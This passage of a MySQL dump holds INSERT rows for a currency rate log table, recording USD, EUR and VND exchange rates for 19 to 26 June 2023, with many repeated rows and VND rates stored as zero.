(5588, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-06-19'),
(5589, 2, 'EUR', 1.000000, 1, 'USD', 1.096600, '2023-06-19'),
(5590, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-06-19'),
(5591, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-06-19'),
(5592, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-06-19'),
(5593, 1, 'USD', 0.000000, 2, 'EUR', 0.911910, '2023-06-19'),
(5594, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-06-19'),
(5595, 2, 'EUR', 0.000000, 1, 'USD', 1.096600, '2023-06-19'),
(5596, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-06-19'),
(5597, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-06-19'),
(5598, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-06-19'),
(5599, 1, 'USD', 1.000000, 2, 'EUR', 0.911910, '2023-06-19'),
(5600, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-06-19'),
(5601, 2, 'EUR', 1.000000, 1, 'USD', 1.096600, '2023-06-19'),
(5602, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-06-19'),
(5603, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-06-19'),
(5604, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-06-19'),
(5605, 1, 'USD', 0.000000, 2, 'EUR', 0.911910, '2023-06-19'),
(5606, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-06-19'),
(5607, 2, 'EUR', 0.000000, 1, 'USD', 1.096600, '2023-06-19'),
(5608, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-06-19'),
(5609, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-06-19'),
(5610, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-06-19'),
(5611, 1, 'USD', 1.000000, 2, 'EUR', 0.911910, '2023-06-19'),
(5612, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-06-19'),
(5613, 2, 'EUR', 1.000000, 1, 'USD', 1.096600, '2023-06-19'),
(5614, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-06-19'),
(5615, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-06-19'),
(5616, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-06-19'),
(5617, 1, 'USD', 0.000000, 2, 'EUR', 0.911910, '2023-06-19'),
(5618, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-06-19'),
(5619, 2, 'EUR', 0.000000, 1, 'USD', 1.096600, '2023-06-19'),
(5620, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-06-19'),
(5621, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-06-19'),
(5622, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-06-19'),
(5623, 1, 'USD', 1.000000, 2, 'EUR', 0.911910, '2023-06-20'),
(5624, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-06-20'),
(5625, 2, 'EUR', 1.000000, 1, 'USD', 1.096600, '2023-06-20'),
(5626, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-06-20'),
(5627, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-06-20'),
(5628, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-06-20'),
(5629, 1, 'USD', 0.000000, 2, 'EUR', 0.915580, '2023-06-20'),
(5630, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-06-20'),
(5631, 2, 'EUR', 0.000000, 1, 'USD', 1.092200, '2023-06-20'),
(5632, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-06-20'),
(5633, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-06-20'),
(5634, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-06-20'),
(5635, 1, 'USD', 1.000000, 2, 'EUR', 0.915580, '2023-06-20'),
(5636, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-06-20'),
(5637, 2, 'EUR', 1.000000, 1, 'USD', 1.092200, '2023-06-20'),
(5638, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-06-20'),
(5639, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-06-20'),
(5640, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-06-20'),
(5641, 1, 'USD', 0.000000, 2, 'EUR', 0.915580, '2023-06-20'),
(5642, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-06-20'),
(5643, 2, 'EUR', 0.000000, 1, 'USD', 1.092200, '2023-06-20'),
(5644, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-06-20'),
(5645, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-06-20'),
(5646, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-06-20'),
(5647, 1, 'USD', 1.000000, 2, 'EUR', 0.915580, '2023-06-20'),
(5648, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-06-20'),
(5649, 2, 'EUR', 1.000000, 1, 'USD', 1.092200, '2023-06-20'),
(5650, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-06-20'),
(5651, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-06-20'),
(5652, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-06-20'),
(5653, 1, 'USD', 0.000000, 2, 'EUR', 0.915580, '2023-06-20'),
(5654, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-06-20'),
(5655, 2, 'EUR', 0.000000, 1, 'USD', 1.092200, '2023-06-20'),
(5656, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-06-20'),
(5657, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-06-20'),
(5658, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-06-20'),
(5659, 1, 'USD', 1.000000, 2, 'EUR', 0.915580, '2023-06-20'),
(5660, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-06-20'),
(5661, 2, 'EUR', 1.000000, 1, 'USD', 1.092200, '2023-06-20'),
(5662, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-06-20'),
(5663, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-06-20'),
(5664, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-06-20'),
(5665, 1, 'USD', 0.000000, 2, 'EUR', 0.915580, '2023-06-20'),
(5666, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-06-20'),
(5667, 2, 'EUR', 0.000000, 1, 'USD', 1.092200, '2023-06-20'),
(5668, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-06-20'),
(5669, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-06-20'),
(5670, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-06-20'),
(5671, 1, 'USD', 1.000000, 2, 'EUR', 0.915580, '2023-06-21'),
(5672, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-06-21'),
(5673, 2, 'EUR', 1.000000, 1, 'USD', 1.092200, '2023-06-21'),
(5674, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-06-21'),
(5675, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-06-21'),
(5676, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-06-21'),
(5677, 1, 'USD', 0.000000, 2, 'EUR', 0.914660, '2023-06-21'),
(5678, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-06-21'),
(5679, 2, 'EUR', 0.000000, 1, 'USD', 1.093300, '2023-06-21'),
(5680, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-06-21'),
(5681, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-06-21'),
(5682, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-06-21'),
(5683, 1, 'USD', 1.000000, 2, 'EUR', 0.914660, '2023-06-21'),
(5684, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-06-21'),
(5685, 2, 'EUR', 1.000000, 1, 'USD', 1.093300, '2023-06-21'),
(5686, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-06-21'),
(5687, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-06-21'),
(5688, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-06-21'),
(5689, 1, 'USD', 0.000000, 2, 'EUR', 0.914660, '2023-06-21'),
(5690, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-06-21'),
(5691, 2, 'EUR', 0.000000, 1, 'USD', 1.093300, '2023-06-21'),
(5692, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-06-21'),
(5693, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-06-21'),
(5694, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-06-21'),
(5695, 1, 'USD', 1.000000, 2, 'EUR', 0.914660, '2023-06-21'),
(5696, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-06-21'),
(5697, 2, 'EUR', 1.000000, 1, 'USD', 1.093300, '2023-06-21'),
(5698, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-06-21'),
(5699, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-06-21'),
(5700, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-06-21'),
(5701, 1, 'USD', 0.000000, 2, 'EUR', 0.914660, '2023-06-21'),
(5702, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-06-21'),
(5703, 2, 'EUR', 0.000000, 1, 'USD', 1.093300, '2023-06-21'),
(5704, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-06-21'),
(5705, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-06-21'),
(5706, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-06-21'),
(5707, 1, 'USD', 1.000000, 2, 'EUR', 0.914660, '2023-06-21'),
(5708, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-06-21'),
(5709, 2, 'EUR', 1.000000, 1, 'USD', 1.093300, '2023-06-21'),
(5710, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-06-21'),
(5711, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-06-21'),
(5712, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-06-21'),
(5713, 1, 'USD', 0.000000, 2, 'EUR', 0.914660, '2023-06-21'),
(5714, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-06-21'),
(5715, 2, 'EUR', 0.000000, 1, 'USD', 1.093300, '2023-06-21'),
(5716, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-06-21'),
(5717, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-06-21'),
(5718, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-06-21'),
(5719, 1, 'USD', 1.000000, 2, 'EUR', 0.914660, '2023-06-22'),
(5720, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-06-22'),
(5721, 2, 'EUR', 1.000000, 1, 'USD', 1.093300, '2023-06-22'),
(5722, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-06-22'),
(5723, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-06-22'),
(5724, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-06-22'),
(5725, 1, 'USD', 0.000000, 2, 'EUR', 0.915500, '2023-06-22'),
(5726, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-06-22'),
(5727, 2, 'EUR', 0.000000, 1, 'USD', 1.092300, '2023-06-22'),
(5728, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-06-22'),
(5729, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-06-22'),
(5730, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-06-22'),
(5731, 1, 'USD', 1.000000, 2, 'EUR', 0.915500, '2023-06-22'),
(5732, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-06-22'),
(5733, 2, 'EUR', 1.000000, 1, 'USD', 1.092300, '2023-06-22'),
(5734, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-06-22'),
(5735, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-06-22'),
(5736, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-06-22'),
(5737, 1, 'USD', 0.000000, 2, 'EUR', 0.915500, '2023-06-22'),
(5738, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-06-22'),
(5739, 2, 'EUR', 0.000000, 1, 'USD', 1.092300, '2023-06-22'),
(5740, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-06-22'),
(5741, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-06-22'),
(5742, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-06-22'),
(5743, 1, 'USD', 1.000000, 2, 'EUR', 0.915500, '2023-06-22'),
(5744, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-06-22'),
(5745, 2, 'EUR', 1.000000, 1, 'USD', 1.092300, '2023-06-22'),
(5746, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-06-22'),
(5747, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-06-22'),
(5748, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-06-22'),
(5749, 1, 'USD', 0.000000, 2, 'EUR', 0.915500, '2023-06-22'),
(5750, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-06-22'),
(5751, 2, 'EUR', 0.000000, 1, 'USD', 1.092300, '2023-06-22'),
(5752, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-06-22'),
(5753, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-06-22'),
(5754, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-06-22'),
(5755, 1, 'USD', 1.000000, 2, 'EUR', 0.915500, '2023-06-22'),
(5756, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-06-22'),
(5757, 2, 'EUR', 1.000000, 1, 'USD', 1.092300, '2023-06-22'),
(5758, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-06-22'),
(5759, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-06-22'),
(5760, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-06-22'),
(5761, 1, 'USD', 0.000000, 2, 'EUR', 0.915500, '2023-06-22'),
(5762, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-06-22'),
(5763, 2, 'EUR', 0.000000, 1, 'USD', 1.092300, '2023-06-22'),
(5764, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-06-22'),
(5765, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-06-22'),
(5766, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-06-22'),
(5767, 1, 'USD', 1.000000, 2, 'EUR', 0.915500, '2023-06-23'),
(5768, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-06-23'),
(5769, 2, 'EUR', 1.000000, 1, 'USD', 1.092300, '2023-06-23'),
(5770, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-06-23'),
(5771, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-06-23'),
(5772, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-06-23'),
(5773, 1, 'USD', 0.000000, 2, 'EUR', 0.910330, '2023-06-23'),
(5774, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-06-23'),
(5775, 2, 'EUR', 0.000000, 1, 'USD', 1.098500, '2023-06-23'),
(5776, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-06-23'),
(5777, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-06-23'),
(5778, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-06-23'),
(5779, 1, 'USD', 1.000000, 2, 'EUR', 0.910330, '2023-06-23'),
(5780, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-06-23'),
(5781, 2, 'EUR', 1.000000, 1, 'USD', 1.098500, '2023-06-23'),
(5782, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-06-23'),
(5783, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-06-23'),
(5784, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-06-23'),
(5785, 1, 'USD', 0.000000, 2, 'EUR', 0.910330, '2023-06-23'),
(5786, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-06-23'),
(5787, 2, 'EUR', 0.000000, 1, 'USD', 1.098500, '2023-06-23'),
(5788, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-06-23'),
(5789, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-06-23'),
(5790, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-06-23'),
(5791, 1, 'USD', 1.000000, 2, 'EUR', 0.910330, '2023-06-23'),
(5792, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-06-23'),
(5793, 2, 'EUR', 1.000000, 1, 'USD', 1.098500, '2023-06-23'),
(5794, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-06-23'),
(5795, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-06-23'),
(5796, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-06-23'),
(5797, 1, 'USD', 0.000000, 2, 'EUR', 0.910330, '2023-06-23'),
(5798, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-06-23'),
(5799, 2, 'EUR', 0.000000, 1, 'USD', 1.098500, '2023-06-23'),
(5800, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-06-23'),
(5801, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-06-23'),
(5802, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-06-23'),
(5803, 1, 'USD', 1.000000, 2, 'EUR', 0.910330, '2023-06-23'),
(5804, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-06-23'),
(5805, 2, 'EUR', 1.000000, 1, 'USD', 1.098500, '2023-06-23'),
(5806, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-06-23'),
(5807, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-06-23'),
(5808, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-06-23'),
(5809, 1, 'USD', 0.000000, 2, 'EUR', 0.910330, '2023-06-23'),
(5810, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-06-23'),
(5811, 2, 'EUR', 0.000000, 1, 'USD', 1.098500, '2023-06-23'),
(5812, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-06-23'),
(5813, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-06-23'),
(5814, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-06-23'),
(5815, 1, 'USD', 1.000000, 2, 'EUR', 0.910330, '2023-06-24'),
(5816, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-06-24'),
(5817, 2, 'EUR', 1.000000, 1, 'USD', 1.098500, '2023-06-24'),
(5818, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-06-24'),
(5819, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-06-24'),
(5820, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-06-24'),
(5821, 1, 'USD', 0.000000, 2, 'EUR', 0.918780, '2023-06-24'),
(5822, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-06-24'),
(5823, 2, 'EUR', 0.000000, 1, 'USD', 1.088400, '2023-06-24'),
(5824, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-06-24'),
(5825, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-06-24'),
(5826, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-06-24'),
(5827, 1, 'USD', 1.000000, 2, 'EUR', 0.918780, '2023-06-24'),
(5828, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-06-24');
INSERT INTO `tblcurrency_rate_logs` (`id`, `from_currency_id`, `from_currency_name`, `from_currency_rate`, `to_currency_id`, `to_currency_name`, `to_currency_rate`, `date`) VALUES
(5829, 2, 'EUR', 1.000000, 1, 'USD', 1.088400, '2023-06-24'),
(5830, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-06-24'),
(5831, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-06-24'),
(5832, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-06-24'),
(5833, 1, 'USD', 0.000000, 2, 'EUR', 0.918780, '2023-06-24'),
(5834, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-06-24'),
(5835, 2, 'EUR', 0.000000, 1, 'USD', 1.088400, '2023-06-24'),
(5836, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-06-24'),
(5837, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-06-24'),
(5838, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-06-24'),
(5839, 1, 'USD', 1.000000, 2, 'EUR', 0.918780, '2023-06-24'),
(5840, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-06-24'),
(5841, 2, 'EUR', 1.000000, 1, 'USD', 1.088400, '2023-06-24'),
(5842, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-06-24'),
(5843, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-06-24'),
(5844, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-06-24'),
(5845, 1, 'USD', 0.000000, 2, 'EUR', 0.918780, '2023-06-24'),
(5846, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-06-24'),
(5847, 2, 'EUR', 0.000000, 1, 'USD', 1.088400, '2023-06-24'),
(5848, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-06-24'),
(5849, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-06-24'),
(5850, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-06-24'),
(5851, 1, 'USD', 1.000000, 2, 'EUR', 0.918780, '2023-06-24'),
(5852, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-06-24'),
(5853, 2, 'EUR', 1.000000, 1, 'USD', 1.088400, '2023-06-24'),
(5854, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-06-24'),
(5855, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-06-24'),
(5856, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-06-24'),
(5857, 1, 'USD', 0.000000, 2, 'EUR', 0.918780, '2023-06-24'),
(5858, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-06-24'),
(5859, 2, 'EUR', 0.000000, 1, 'USD', 1.088400, '2023-06-24'),
(5860, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-06-24'),
(5861, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-06-24'),
(5862, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-06-24'),
(5863, 1, 'USD', 1.000000, 2, 'EUR', 0.918780, '2023-06-25'),
(5864, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-06-25'),
(5865, 2, 'EUR', 1.000000, 1, 'USD', 1.088400, '2023-06-25'),
(5866, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-06-25'),
(5867, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-06-25'),
(5868, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-06-25'),
(5869, 1, 'USD', 0.000000, 2, 'EUR', 0.918780, '2023-06-25'),
(5870, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-06-25'),
(5871, 2, 'EUR', 0.000000, 1, 'USD', 1.088400, '2023-06-25'),
(5872, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-06-25'),
(5873, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-06-25'),
(5874, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-06-25'),
(5875, 1, 'USD', 1.000000, 2, 'EUR', 0.918780, '2023-06-25'),
(5876, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-06-25'),
(5877, 2, 'EUR', 1.000000, 1, 'USD', 1.088400, '2023-06-25'),
(5878, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-06-25'),
(5879, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-06-25'),
(5880, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-06-25'),
(5881, 1, 'USD', 0.000000, 2, 'EUR', 0.918780, '2023-06-25'),
(5882, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-06-25'),
(5883, 2, 'EUR', 0.000000, 1, 'USD', 1.088400, '2023-06-25'),
(5884, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-06-25'),
(5885, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-06-25'),
(5886, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-06-25'),
(5887, 1, 'USD', 1.000000, 2, 'EUR', 0.918780, '2023-06-25'),
(5888, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-06-25'),
(5889, 2, 'EUR', 1.000000, 1, 'USD', 1.088400, '2023-06-25'),
(5890, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-06-25'),
(5891, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-06-25'),
(5892, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-06-25'),
(5893, 1, 'USD', 0.000000, 2, 'EUR', 0.918780, '2023-06-25'),
(5894, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-06-25'),
(5895, 2, 'EUR', 0.000000, 1, 'USD', 1.088400, '2023-06-25'),
(5896, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-06-25'),
(5897, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-06-25'),
(5898, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-06-25'),
(5899, 1, 'USD', 1.000000, 2, 'EUR', 0.918780, '2023-06-25'),
(5900, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-06-25'),
(5901, 2, 'EUR', 1.000000, 1, 'USD', 1.088400, '2023-06-25'),
(5902, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-06-25'),
(5903, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-06-25'),
(5904, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-06-25'),
(5905, 1, 'USD', 0.000000, 2, 'EUR', 0.918780, '2023-06-25'),
(5906, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-06-25'),
(5907, 2, 'EUR', 0.000000, 1, 'USD', 1.088400, '2023-06-25'),
(5908, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-06-25'),
(5909, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-06-25'),
(5910, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-06-25'),
(5911, 1, 'USD', 1.000000, 2, 'EUR', 0.918780, '2023-06-26'),
(5912, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-06-26'),
(5913, 2, 'EUR', 1.000000, 1, 'USD', 1.088400, '2023-06-26'),
(5914, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-06-26'),
(5915, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-06-26'),
(5916, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-06-26'),
(5917, 1, 'USD', 0.000000, 2, 'EUR', 0.918780, '2023-06-26'),
(5918, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-06-26'),
(5919, 2, 'EUR', 0.000000, 1, 'USD', 1.088400, '2023-06-26'),
(5920, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-06-26'),
(5921, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-06-26'),
(5922, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-06-26'),
(5923, 1, 'USD', 1.000000, 2, 'EUR', 0.918780, '2023-06-26'),
(5924, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-06-26'),
(5925, 2, 'EUR', 1.000000, 1, 'USD', 1.088400, '2023-06-26'),
(5926, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-06-26'),
(5927, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-06-26'),
(5928, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-06-26'),
(5929, 1, 'USD', 0.000000, 2, 'EUR', 0.918780, '2023-06-26'),
(5930, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-06-26'),
(5931, 2, 'EUR', 0.000000, 1, 'USD', 1.088400, '2023-06-26'),
(5932, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-06-26'),
(5933, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-06-26'),
(5934, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-06-26'),
(5935, 1, 'USD', 1.000000, 2, 'EUR', 0.918780, '2023-06-26'),
(5936, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-06-26'),
